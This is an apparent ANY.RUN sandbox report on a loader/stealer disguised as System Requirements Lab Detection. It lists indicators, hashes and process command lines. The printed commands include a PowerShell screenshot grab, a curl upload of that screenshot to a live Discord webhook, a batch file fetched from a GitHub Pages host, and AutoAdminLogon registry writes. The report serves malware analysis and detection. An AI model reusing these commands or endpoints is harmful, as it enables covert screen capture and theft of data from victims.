File name:

Detection (i0y).exe

Full analysis: https://app.any.run/tasks/a5ad0ad6-cb8c-4736-bcb9-eacf94d1ed52
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: April 14, 2025, 22:52:58
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
systemrequirementslab
tool
evasion
loader
discord
batch
stealer
ims-api
generic
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 7 sections
MD5:

8A928D5B4EAA0D1F25FDDE064FCE2DD8

SHA1:

0DCB10D745C6D43AADAA1AB97B7CCE0C1E85F1CB

SHA256:

64137FB074BA4603E4C3BAE70E3D549F457338E10B69FD01D7D2603C20940ECD

SSDEEP:

98304:pYWfMpTJ1OGh/jKVAxzvIbGuJ6HAqzHpDN521t0D4DJSuOV:lfMpTRxhPxn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses Task Scheduler to autorun other applications

      • cmd.exe (PID: 5936)

    • Starts NET.EXE to view/add/change user profiles

      • net.exe (PID: 5260)
      • powershell.exe (PID: 1300)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4724)
      • powershell.exe (PID: 1672)
      • powershell.exe (PID: 6704)
      • powershell.exe (PID: 1208)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4724)
      • powershell.exe (PID: 6704)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 2960)
      • cmd.exe (PID: 672)
      • cmd.exe (PID: 6488)
      • cmd.exe (PID: 7060)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 4724)
      • powershell.exe (PID: 6704)

    • BATCH has been detected

      • curl.exe (PID: 1196)
      • curl.exe (PID: 6960)

  • SUSPICIOUS

    • Starts NET.EXE to display or manage information about active sessions

      • net.exe (PID: 4120)
      • net.exe (PID: 6344)
      • cmd.exe (PID: 5400)
      • cmd.exe (PID: 2960)
      • net.exe (PID: 6040)
      • cmd.exe (PID: 4180)
      • cmd.exe (PID: 6488)
      • net.exe (PID: 6612)

    • Executing commands from a ".bat" file

      • powershell.exe (PID: 1228)
      • wscript.exe (PID: 2088)
      • wscript.exe (PID: 1012)
      • cscript.exe (PID: 5256)
      • wscript.exe (PID: 4196)
      • cscript.exe (PID: 7004)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 5400)
      • wscript.exe (PID: 2088)
      • wscript.exe (PID: 1012)
      • cmd.exe (PID: 2960)
      • cscript.exe (PID: 5256)
      • powershell.exe (PID: 1228)
      • wscript.exe (PID: 4196)
      • cmd.exe (PID: 6488)
      • cscript.exe (PID: 7004)

    • Reads security settings of Internet Explorer

      • Detection (i0y).exe (PID: 7152)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 4180)
      • cmd.exe (PID: 1132)
      • cmd.exe (PID: 4040)
      • cmd.exe (PID: 5528)
      • cmd.exe (PID: 2960)
      • cmd.exe (PID: 672)
      • cmd.exe (PID: 6488)
      • cmd.exe (PID: 7060)

    • Application launched itself

      • cmd.exe (PID: 5400)
      • cmd.exe (PID: 2960)
      • cmd.exe (PID: 6488)

    • The process executes VB scripts

      • cmd.exe (PID: 5400)
      • cmd.exe (PID: 5936)
      • cmd.exe (PID: 2960)
      • cmd.exe (PID: 6488)

    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 5936)
      • cmd.exe (PID: 2960)
      • cmd.exe (PID: 6488)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2088)
      • wscript.exe (PID: 1012)
      • cscript.exe (PID: 5256)

    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 5400)
      • cmd.exe (PID: 2960)
      • cmd.exe (PID: 6488)

    • Manipulates environment variables

      • powershell.exe (PID: 3888)

    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 5528)

    • The process executes Powershell scripts

      • cmd.exe (PID: 2960)
      • cmd.exe (PID: 672)
      • cmd.exe (PID: 6488)
      • cmd.exe (PID: 7060)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2960)

    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 5528)
      • cmd.exe (PID: 6228)
      • cmd.exe (PID: 7100)
      • cmd.exe (PID: 5464)

    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 6252)
      • cmd.exe (PID: 4280)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 4724)
      • powershell.exe (PID: 6704)

    • Execution of CURL command

      • cmd.exe (PID: 2960)
      • cmd.exe (PID: 6488)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 2960)
      • cmd.exe (PID: 6488)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • cmd.exe (PID: 2960)

    • Checks for external IP

      • curl.exe (PID: 3332)
      • svchost.exe (PID: 2208)
      • curl.exe (PID: 6596)

    • The process executes via Task Scheduler

      • PLUGScheduler.exe (PID: 4176)
      • wscript.exe (PID: 4196)

    • Starts process via Powershell

      • powershell.exe (PID: 1228)

    • Data upload via CURL

      • curl.exe (PID: 1196)
      • curl.exe (PID: 6960)

  • INFO

    • Checks supported languages

      • Detection (i0y).exe (PID: 7152)
      • mode.com (PID: 2088)
      • mode.com (PID: 1040)
      • curl.exe (PID: 3332)
      • curl.exe (PID: 4560)
      • PLUGScheduler.exe (PID: 4176)
      • curl.exe (PID: 1196)
      • mode.com (PID: 6576)
      • mode.com (PID: 6588)
      • curl.exe (PID: 6596)
      • curl.exe (PID: 6960)
      • curl.exe (PID: 6628)

    • Checks proxy server information

      • Detection (i0y).exe (PID: 7152)
      • powershell.exe (PID: 4724)
      • powershell.exe (PID: 1672)
      • powershell.exe (PID: 6704)
      • powershell.exe (PID: 1208)

    • SYSTEMREQUIREMENTSLAB mutex has been found

      • Detection (i0y).exe (PID: 7152)

    • The sample compiled with english language support

      • Detection (i0y).exe (PID: 7152)

    • Reads the computer name

      • Detection (i0y).exe (PID: 7152)
      • curl.exe (PID: 4560)
      • curl.exe (PID: 3332)
      • curl.exe (PID: 1196)
      • PLUGScheduler.exe (PID: 4176)
      • curl.exe (PID: 6960)
      • curl.exe (PID: 6596)
      • curl.exe (PID: 6628)

    • Manual execution by a user

      • cmd.exe (PID: 4180)

    • Starts MODE.COM to configure console settings

      • mode.com (PID: 1040)
      • mode.com (PID: 2088)
      • mode.com (PID: 6576)
      • mode.com (PID: 6588)

    • Reads the time zone

      • net1.exe (PID: 3332)

    • Disables trace logs

      • powershell.exe (PID: 4724)
      • powershell.exe (PID: 1672)
      • powershell.exe (PID: 6704)
      • powershell.exe (PID: 1208)

    • Reads security settings of Internet Explorer

      • cscript.exe (PID: 5256)
      • WMIC.exe (PID: 6148)
      • WMIC.exe (PID: 1760)
      • WMIC.exe (PID: 5436)
      • WMIC.exe (PID: 7124)
      • cscript.exe (PID: 7004)
      • WMIC.exe (PID: 5632)
      • WMIC.exe (PID: 6456)

    • Execution of CURL command

      • cmd.exe (PID: 6388)
      • cmd.exe (PID: 2960)
      • cmd.exe (PID: 6564)
      • cmd.exe (PID: 6488)

    • Attempting to use instant messaging service

      • curl.exe (PID: 1196)
      • curl.exe (PID: 6628)
      • svchost.exe (PID: 2208)

    • Creates files in the program directory

      • PLUGScheduler.exe (PID: 4176)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(2960) cmd.exe
Discord-Webhook-Tokens (1)1358566144965087322/08sBhl-oozpl6Thc2JVpThtq8GHBzIvfMJXhB-kq_yE_18TVbd_Rj_AHF-6zGD_gyY_9
Discord-Info-Links
1358566144965087322/08sBhl-oozpl6Thc2JVpThtq8GHBzIvfMJXhB-kq_yE_18TVbd_Rj_AHF-6zGD_gyY_9
Get Webhook Infohttps://discord.com/api/webhooks/1358566144965087322/08sBhl-oozpl6Thc2JVpThtq8GHBzIvfMJXhB-kq_yE_18TVbd_Rj_AHF-6zGD_gyY_9
No Malware configuration.

TRiD

.exe | Generic Win/DOS Executable (50)
.exe | DOS Executable Generic (49.9)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2024:06:27 15:47:30+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.39
CodeSize: 2560512
InitializedDataSize: 2558976
UninitializedDataSize: -
EntryPoint: 0x2227dc
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 6.5.23.0
ProductVersionNumber: 6.5.23.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Husdawg, LLC
FileDescription: System Requirements Lab Detection
FileVersion: 6,5,23
InternalName: SRL Detection
LegalCopyright: (c) Husdawg, LLC. All rights reserved.
OriginalFileName: detection.exe
ProductName: System Requirements Lab Detection
ProductVersion: 6,5,23
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
337
Monitored processes
90
Malicious processes
13
Suspicious processes
2

Behavior graph

Click at the process to see the details
start detection (i0y).exe cmd.exe no specs conhost.exe no specs mode.com no specs net.exe no specs net1.exe no specs powershell.exe no specs cmd.exe conhost.exe no specs mode.com no specs net.exe no specs net1.exe no specs cmd.exe no specs findstr.exe no specs wscript.exe no specs cmd.exe conhost.exe no specs timeout.exe no specs schtasks.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs mode.com no specs net.exe no specs net1.exe no specs cmd.exe no specs findstr.exe no specs cmd.exe no specs powershell.exe no specs hostname.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs reg.exe no specs reg.exe no specs powershell.exe no specs net.exe no specs net1.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs powershell.exe cscript.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs wmic.exe no specs powershell.exe cmd.exe no specs wmic.exe no specs cmd.exe no specs wmic.exe no specs cmd.exe no specs curl.exe curl.exe powershell.exe no specs #BATCH curl.exe timeout.exe no specs slui.exe no specs powershell.exe no specs svchost.exe plugscheduler.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs mode.com no specs net.exe no specs net1.exe no specs cmd.exe no specs findstr.exe no specs powershell.exe cscript.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs wmic.exe no specs powershell.exe cmd.exe no specs wmic.exe no specs cmd.exe no specs wmic.exe no specs cmd.exe no specs curl.exe curl.exe powershell.exe no specs #BATCH curl.exe timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
208C:\WINDOWS\system32\cmd.exe /S /D /c" echo C:\Users\admin\AppData\Roaming\appdiagnostics\ "C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
668powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $bmp = New-Object Drawing.Bitmap([Windows.Forms.SystemInformation]::VirtualScreen.Width, [Windows.Forms.SystemInformation]::VirtualScreen.Height); $graphics = [Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen([Windows.Forms.SystemInformation]::VirtualScreen.Left, [Windows.Forms.SystemInformation]::VirtualScreen.Top, 0, 0, $bmp.Size); $bmp.Save('C:\Users\admin\AppData\Local\Temp\screen.png', [Drawing.Imaging.ImageFormat]::Png);C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
672C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\rc.bat" "C:\Windows\System32\cmd.execscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
3221225786
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
720\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
856findstr /I /C:"C:\Users\admin\AppData\Roaming\appdiagnostics" C:\Windows\System32\findstr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Find String (QGREP) Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\findstr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
968timeout /t 1 /nobreak C:\Windows\System32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
timeout - pauses command processing
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1012"wscript.exe" "C:\Users\admin\AppData\Roaming\appdiagnostics\logs.vbs"C:\Windows\System32\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1040mode con: cols=15 lines=1C:\Windows\System32\mode.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
DOS Device MODE Utility
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mode.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1132C:\WINDOWS\system32\cmd.exe /c powershell -command "Write-Output (hostname)"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1196curl -X POST -F "payload_json={\"content\": \"Screenshot at 22:53:49.00\"}" -F "file=@C:\Users\admin\AppData\Local\Temp\screen.png" "https://discord.com/api/webhooks/1358566144965087322/08sBhl-oozpl6Thc2JVpThtq8GHBzIvfMJXhB-kq_yE_18TVbd_Rj_AHF-6zGD_gyY_9" C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
Total events
66 410
Read events
66 403
Write events
7
Delete events
0

Modification events

(PID) Process:(1228) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.FriendlyAppName
Value:
Windows Command Processor
(PID) Process:(1228) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.ApplicationCompany
Value:
Microsoft Corporation
(PID) Process:(6136) reg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:legalnoticecaption
Value:
CK-66NY40FH
(PID) Process:(6516) reg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:legalnoticetext
Value:
This system is monitored.
(PID) Process:(3240) reg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Operation:writeName:AutoAdminLogon
Value:
1
(PID) Process:(6676) reg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Operation:writeName:DefaultUsername
Value:
CK-66NY40FH
(PID) Process:(5056) reg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Operation:writeName:DefaultPassword
Value:
Executable files
0
Suspicious files
48
Text files
39
Unknown types
0

Dropped files

PID
Process
Filename
Type
1228powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:A04951A41838AF3B7FAB5F8B6F2215B7
SHA256:81C30BE69F3A8720344B4CFD6D92567ED2CA65336BF47325B784E8907948C03E
2908powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xwb2ythq.ovt.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1228powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kafkahc3.1in.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1228powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tlhmcrlv.zud.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2340powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ml3gyebt.1la.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1300powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jsw4zuvn.jbv.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6668powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cfv13a14.rqe.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6668powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_b0wngp1g.33w.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2340powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yubaeeqa.bxw.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6576powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zcf1edf3.uck.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
15
TCP/UDP connections
52
DNS requests
31
Threats
27

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
7152
Detection (i0y).exe
GET
400
34.202.97.43:80
http://www.systemrequirementslab.com/api/session/i0y/?apikey=9972FAF8-F36D-4FAA-9EF1-4301C3D354C0
unknown
unknown
7152
Detection (i0y).exe
GET
400
34.202.97.43:80
http://www.systemrequirementslab.com/api/session/i0y/?apikey=9972FAF8-F36D-4FAA-9EF1-4301C3D354C0
unknown
unknown
736
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4724
powershell.exe
GET
301
185.199.109.153:80
http://crudekiss.github.io/rc/rc.bat
unknown
unknown
756
lsass.exe
GET
200
142.250.185.195:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
736
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
756
lsass.exe
GET
200
142.250.185.195:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
1672
powershell.exe
POST
200
185.176.43.102:80
http://byxln4cj.atwebpages.com/update.php
unknown
malicious
3544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
7152
Detection (i0y).exe
34.202.97.43:80
www.systemrequirementslab.com
AMAZON-AES
US
suspicious
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
736
SIHClient.exe
20.109.210.53:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
736
SIHClient.exe
23.52.120.96:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
736
SIHClient.exe
40.69.42.241:443
fe3cr.delivery.mp.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.166
whitelisted
google.com
  • 172.217.18.14
whitelisted
www.systemrequirementslab.com
  • 34.202.97.43
  • 3.228.150.188
unknown
client.wns.windows.com
  • 172.211.123.248
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted
www.microsoft.com
  • 23.52.120.96
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 40.69.42.241
whitelisted
crudekiss.github.io
  • 185.199.109.153
  • 185.199.110.153
  • 185.199.108.153
  • 185.199.111.153
unknown
api.ipify.org
  • 172.67.74.152
  • 104.26.12.205
  • 104.26.13.205
shared

Threats

PID
Process
Class
Message
4724
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2196
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
3332
curl.exe
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
2196
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
4560
curl.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
2196
svchost.exe
Misc activity
ET INFO Discord Chat Service Domain in DNS Lookup (discord .com)
4560
curl.exe
Misc activity
ET INFO Observed Discord Service Domain (discord .com) in TLS SNI
1672
powershell.exe
Misc activity
ET HUNTING Suspicious HTTP POST to Free Web Host Atwebpages
1672
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
1672
powershell.exe
Misc activity
SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Detection (i0y).exe